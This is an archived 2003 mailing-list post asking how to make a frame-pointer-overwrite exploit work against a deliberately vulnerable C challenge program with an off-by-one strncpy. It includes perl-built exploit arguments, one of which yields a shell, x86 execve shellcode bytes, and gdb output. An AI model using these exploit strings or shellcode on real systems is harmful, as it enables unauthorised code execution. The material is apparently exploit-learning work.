Hey guys, I'm having some trouble with frame pointer overwriting, and I was wondering if anyone could shed any light on this. First of all, here is the vulnerable program: mikecc@darkstar frame $ cat vuln_6.c /* Is It Vulnerable!? you sure? check again! */ /* * bob.dtors.net * * --------------------------------------------------- * Dtors Security Research (DSR) * Code by: bob * Mail: bobat_private * --------------------------------------------------- * * Build it and exploit it * show us the exploitation log and get extra rights !! * * * Is It Vulnerable!? you sure? check again! * -- this code was taken from bobs person homepage * http://it.dtors.net */ #include <stdio.h> #include <string.h> #define SIZE 256 void bob(char *ptr) { char buffer[SIZE]; strncpy(buffer, ptr, SIZE+1); printf("buffer is at %p\n",buffer); { int a,b; for (a=b=0;a<=SIZE;a++,b+=3) { if (b!=0 && !(b%26)) printf("\n"); printf("%02x ", (unsigned char)buffer[a]); } printf("\n"); } } int main(int argc, char **argv, char **envp) { if (argc < 2) { fprintf(stdout, "bobat_private\n"); exit(1); } bob(argv[1]); return 0; } mikecc@darkstar frame $ Now, I can exploit this if I store the shellcode in the environment: mikecc@darkstar frame $ ./6 `perl -e 'print "\xd0\xfd\xff\xbf"x64 . "\x00"'` buffer is at 0xbffff4a8 d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf 00 sh-2.05b$ But, I do not understand how to find the overflow byte, or why this one works: \x00 Now since I am researching a remote frame pointer overwrite, I need to learn how to store the exploit string in the command line: mikecc@darkstar frame $ ./6 `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\xe3\x52\x53\x89\xe1\xcd\x80\x90\x90" . "\x63\xf9\xff\xbf"x58 . "\x09"'` buffer is at 0xbffff6a8 6a 0b 58 99 52 68 6e 2f 73 68 68 2f 2f 62 69 e3 52 53 89 e1 cd 80 90 90 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 00 Illegal instruction (core dumped) mikecc@darkstar frame $ When I open up the core dump, I check ebp: (gdb) i reg ebp ebp 0xbffff963 0xbffff963 (gdb) Now since I cannot copy and paste weird ASCII characters in Evolution, I do: x/s $ebp and it shows my shellcode. Why is this not executing a shell? Thanks, Mike
This archive was generated by hypermail 2b30 : Fri May 23 2003 - 12:19:02 PDT